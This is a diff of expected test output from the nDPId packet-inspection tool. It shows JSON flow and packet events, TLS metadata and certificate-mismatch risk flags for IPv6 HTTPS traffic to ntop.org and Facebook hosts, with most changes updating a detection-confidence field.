+00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} 
@@ -54,9 +54,9 @@ 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} 
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} 
@@ -68,23 +68,23 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} 
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} 